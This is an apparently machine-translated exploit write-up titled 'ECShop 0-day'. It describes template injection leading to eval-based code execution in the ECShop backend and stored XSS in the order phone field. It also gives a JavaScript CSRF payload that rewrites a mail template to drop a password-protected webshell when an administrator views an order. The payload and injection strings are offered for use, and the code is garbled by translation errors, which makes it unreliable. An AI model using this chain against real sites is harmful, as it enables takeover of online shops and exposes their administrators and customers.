Ecshop 0-day

ECShop is a B2C independent online shop system under ShopEx. It is suitable for enterprises and individuals to quickly build personalized online stores. The system is a cross-platform open source program developed based on the PHP language and MYSQL database framework. Supports sales of various types of products. physical products and virtual products (such as phone cards and game cards) can be managed in the same online store. A flexible and powerful template mechanism is provided. Multiple built-in templates are free and exquisite, and can be changed at any time in the background, allowing you to quickly create different online shop appearances. At the same time, you can customize the design of online shop templates to create a personalized online shop image.0x0 backend getshellIn the receivdes/cls_template.php fetch function/*** process the template file ** @ access public * @ param string $ filename * @ param sting $ cache_id ** @ return sring */function fetch ($ filename, $ cache_id = '') {if (! $ This-> _ seterror) {error_reporting (E_ALL ^ E_NOTICE);} $ this-> _ seterror ++; // If $ filename uses str: if (strncmp ($ filename, 'str: ', 4) = 0) {$ out = $ this-> _ eval ($ this-> fetch_str (substr ($ filename, 4 )));}............ we can see that if $ filename starts with "str:", call the _ eval () function to execute the Code following "str, however, before execution, the system calls the fetch_str function to find and replace characters. _ Eval (): function _ eval ($ content) {ob_start (); eval ('? '. '> '. Trim ($ content); $ content = ob_get_contents (); ob_end_clean (); return $ content;} call eval () to execute $ content. Check fetch_str () /*** process the string function ** @ access public * @ param string $ source ** @ return string */function fetch_str ($ source) {if (! Defined ('ecs _ admin') {$ source = $ this-> smarty_prefilter_preCompile ($ source) ;}$ source = preg_replace ("/<\? [^> <] + \?> | <\ % [^> <] + \ %> | <Script [^>] + language [^>] * = [^>] * php [^>] *> [^> <] * <\/script \ s *>/iU ", "", $ source); return preg_replace ("/{([^ \} \ {\ n] *)}/e ", "\ $ this-> select ('\ 1');", $ source);} filters php language tags. Now you need to check which code calls this function and find this code: wholesale. php/* submit * // -- submit the order/* then */elseif ($ _ REQUEST ['ac'] = 'submit _ Order') {include_once (ROOT_PATH. 'regiondes/lib_order.php ');................................. ........................................ ..... /* send an email to the merchant */if ($ _ CFG ['service _ ema Il ']! = '') {$ Tpl = get_mail_template ('remind _ of_new_order ');........................... ........................................ ..... $ content = $ smarty-> fetch ('str :'. $ tpl ['template _ content']); .......} at the place where the order is submitted, you can see that the Code calls get_mail_template () to obtain the content of the remind_of_new_order template, and then puts it in fetch for execution, if you can control the content of the remind_of_new_order template, let ecshop execute our command. In the background, you can find the email template in template management and change the remind_of_new_order content to "{$ phpinfo () ']; phpinfo ();/*}", then we can see that the code is replaced with "<? Php echo $ this-> _ var ['phpinfo () ']; phpinfo ();/*'];?> "The Code is successfully executed.


 0x1 foreground xssThe front-end is not sufficiently filtered in some places, which allows users to construct malicious javascript to complete xss attacks against the background administrator. After registering a user, you can buy anything at will. In the receiver's information, only the local client is checked in the phone column, without backend filtering, which is easy to detect xss attacks.0x2 xss + getshell in the backgroundBecause there is no csrf protection, the xss can go to the background at the front end and ask the Administrator to help us getshell. The following is the js Implementation of getshell: www.2cto. comVar Shelldata = 'subject = % C3 % DC % C2 % EB % D5 % D2 % BB % D8 & mail_type = 0 & tpl = 1 & content = % 7B % 24user_name % 27% 5D % signature % 28base64_decode % 28% 27c2hlbGwucGhw % 27% 2Cbase64_decode % 29% signature % 3D % 28% 27% 29% 3 Becho + % 24var % 5B % 29% 24user_name % 7D % 0D % 0A % 3C % 2Fp % 3E % 0D % 0A % 3Cp % 3E % 7B % 24user_name % 7D % C4 % FA % BA % C3 % A3 % A1 % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % C4 % FA % D2 % D1 % BE % AD % BD % F8 % D0 % D0 % C1 % CB % C3 % DC % C2 % EB % D6 % D8 % D6 % C3 % B5 % C4 % b2 % D9 % D7 % F7 % A3 % AC % C7 % EB % B5 % E3 % BB % F7 % D2 % D4 % CF % C2 % C1 % B4 % BD % D3 % 28% BB % F2 % D5 % DF % B8 % B4 % D6 % C6 % B5 % BD % C4 % FA % B5 % C4 % E4 % AF % C0 % C0 % C6 % F7 % 29% 3A % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 3Ca + target % 3D % 22_blank % 22 + href % 3D % 22% 7B % 24reset_email % 7D % 22% 3E % 7B % 24reset_email % 7D % 3C % 2Fa % 3E % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % D2 % D4 % C8 % B7 % C8 % CF % C4 % FA % B5 % C4 % D0 % C2 % C3 % DC % C2 % E B % D6 % D8 % D6 % C3 % B2 % D9 % D7 % F7 % A3 % A1 % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24shop_name % 7D % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24send_date % 7D % 3C % 2Fp % 3E '; try {var xml = window. XMLHttpRequest? (New XMLHttpRequest (): (new ActiveXObject ('Microsoft. xmlhttp'); xml. open ("POST", '/ecshop/upload/admin/mail_template.php? Act = save_template ', false); xml. setRequestHeader ('content-type', 'application/x-www-form-urlencoded'); xml. onreadystatechange = function () {if (xml. readyState = 4) {}}; xml. send (Shelldata);} catch (e) {} upload the js image and reference it or directly reference it from an external website. For test convenience, the order is submitted from the local reference. The Administrator accesses the order and retrieves the password. The shell is generated in the root directory. php, password 207. the administrator can retrieve the password template before accessing the order: the administrator can view the email template after the order is viewed, and the user can retrieve the password at the front end. A shell statement is generated in the root directory. php